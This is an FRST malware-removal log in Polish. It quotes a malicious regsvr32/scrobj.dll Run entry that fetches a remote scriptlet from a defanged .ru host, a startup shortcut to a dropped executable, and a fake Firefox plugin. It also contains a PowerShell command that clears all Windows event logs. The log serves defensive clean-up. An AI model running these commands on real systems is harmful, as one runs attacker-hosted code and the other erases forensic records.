Rezultat naprawy Farbar Recovery Scan Tool (x86) Wersja: 27-11-2017 Uruchomiony przez User (28-11-2017 19:48:28) Run:1 Uruchomiony z C:\Users\User\Desktop\FRST Załadowane profile: User (Dostępne profile: User) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1293939364-4137197343-2779268670-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== UWAGA Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u.lnk [2017-10-02] ShortcutTarget: u.lnk -> C:\Users\User\AppData\Roaming\eeYgAJnQex.exe () C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u.lnk C:\Users\User\AppData\Roaming\eeYgAJnQex.exe FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku] ContextMenuHandlers4: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> Brak pliku ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> Brak pliku CMD: dir /a C:\Users\User\AppData\Roaming Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKU\S-1-5-21-1293939364-4137197343-2779268670-1000\Software\Microsoft\Windows\CurrentVersion\Run\\COM+ => Wartość pomyślnie usunięto C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u.lnk => pomyślnie przeniesiono C:\Users\User\AppData\Roaming\eeYgAJnQex.exe => pomyślnie przeniesiono "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u.lnk" => nie znaleziono. "C:\Users\User\AppData\Roaming\eeYgAJnQex.exe" => nie znaleziono. HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE => klucz pomyślnie usunięto HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\Offline Files => klucz pomyślnie usunięto HKLM\Software\Classes\CLSID\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => klucz nie znaleziono HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\Offline Files => klucz pomyślnie usunięto HKLM\Software\Classes\CLSID\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => klucz nie znaleziono ========= dir /a C:\Users\User\AppData\Roaming ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: 6210-FEFF Katalog: C:\Users\User\AppData\Roaming 2017-11-28 19:48